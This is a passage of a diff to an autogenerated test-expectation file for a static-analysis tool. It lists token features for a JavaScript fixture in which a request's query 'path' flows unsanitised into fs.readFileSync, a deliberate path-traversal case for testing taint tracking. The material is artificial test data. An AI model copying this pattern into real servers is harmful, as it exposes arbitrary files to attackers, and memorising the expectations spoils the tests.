autogenerated/TaintedPath/tainted-access-paths.js:6:18:6:22 | parse | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:26 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:26 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:26 | req | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:30 | req.url | calleeImports | url | @@ -10497,6 +83385,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:30 | req.url | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:6:24:6:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:28:6:30 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:28:6:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:28:6:30 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:28:6:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:28:6:30 | url | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:6:33:6:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-access-paths.js:6:33:6:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-access-paths.js:6:33:6:36 | true | calleeImports | url | @@ -10506,6 +83399,41 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:6:33:6:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:6:33:6:36 | true | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:6:33:6:36 | true | receiverName | url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:39:6:43 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:39:6:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:39:6:43 | query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:39:6:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:39:6:43 | query | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:6:45:6:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:6:45:6:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:6:45:6:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:6:45:6:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:6:45:6:48 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:4 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:4 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:17 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:17 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | exceptional return of fs.read ... c(path) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | fs.read ... c(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:8:3:8:23 | fs.read ... c(path) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:8:6:8:17 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:8:6:8:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:8:6:8:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:8:6:8:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:8:6:8:17 | readFileSync | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:8:19:8:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:8:19:8:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:8:19:8:22 | path | calleeImports | fs | @@ -10515,6 +83443,81 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:8:19:8:22 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:8:19:8:22 | path | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:8:19:8:22 | path | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:9 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:9 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:9 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:9 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:9 | obj | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj = b ... : path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj = b ... : path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj = b ... : path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj = b ... : path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:7:10:36 | obj = b ... : path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:15 | bla | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:15 | bla | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:15 | bla | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:15 | bla | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:15 | bla | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:36 | bla ? s ... : path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:36 | bla ? s ... : path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:36 | bla ? s ... : path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:36 | bla ? s ... : path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:13:10:36 | bla ? s ... : path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:27 | something | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:27 | something | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:27 | something | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:27 | something | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:27 | something | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | exceptional return of something() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | exceptional return of something() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | exceptional return of something() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | exceptional return of something() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | exceptional return of something() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | something() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | something() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | something() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | something() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:19:10:29 | something() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:10:33:10:36 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:10:33:10:36 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:10:33:10:36 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:10:33:10:36 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:10:33:10:36 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:4 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:4 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:17 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:17 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | exceptional return of fs.read ... bj.sub) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | exceptional return of fs.read ... bj.sub) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | exceptional return of fs.read ... bj.sub) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | exceptional return of fs.read ... bj.sub) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | exceptional return of fs.read ... bj.sub) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | fs.read ... bj.sub) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | fs.read ... bj.sub) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | fs.read ... bj.sub) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | fs.read ... bj.sub) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:3:12:26 | fs.read ... bj.sub) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:12:6:12:17 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:6:12:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:12:6:12:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:6:12:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:6:12:17 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:21 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:21 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:21 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:21 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:21 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:25 | obj.sub | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:25 | obj.sub | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:25 | obj.sub | calleeImports | fs | @@ -10524,6 +83527,67 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:25 | obj.sub | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:25 | obj.sub | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:12:19:12:25 | obj.sub | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:12:23:12:25 | sub | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:12:23:12:25 | sub | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:12:23:12:25 | sub | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:12:23:12:25 | sub | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:12:23:12:25 | sub | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:5 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:5 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:5 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:5 | obj | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:9 | obj.sub | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:9 | obj.sub | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:9 | obj.sub | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:9 | obj.sub | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:9 | obj.sub | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:18 | obj.sub = "safe" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:18 | obj.sub = "safe" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:18 | obj.sub = "safe" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:18 | obj.sub = "safe" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:14:3:14:18 | obj.sub = "safe" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:14:7:14:9 | sub | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:14:7:14:9 | sub | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:14:7:14:9 | sub | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:14:7:14:9 | sub | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:14:7:14:9 | sub | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:14:13:14:18 | "safe" | assignedToPropName | sub | +| autogenerated/TaintedPath/tainted-access-paths.js:14:13:14:18 | "safe" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:14:13:14:18 | "safe" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:14:13:14:18 | "safe" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:14:13:14:18 | "safe" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:14:13:14:18 | "safe" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:4 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:4 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:17 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:17 | 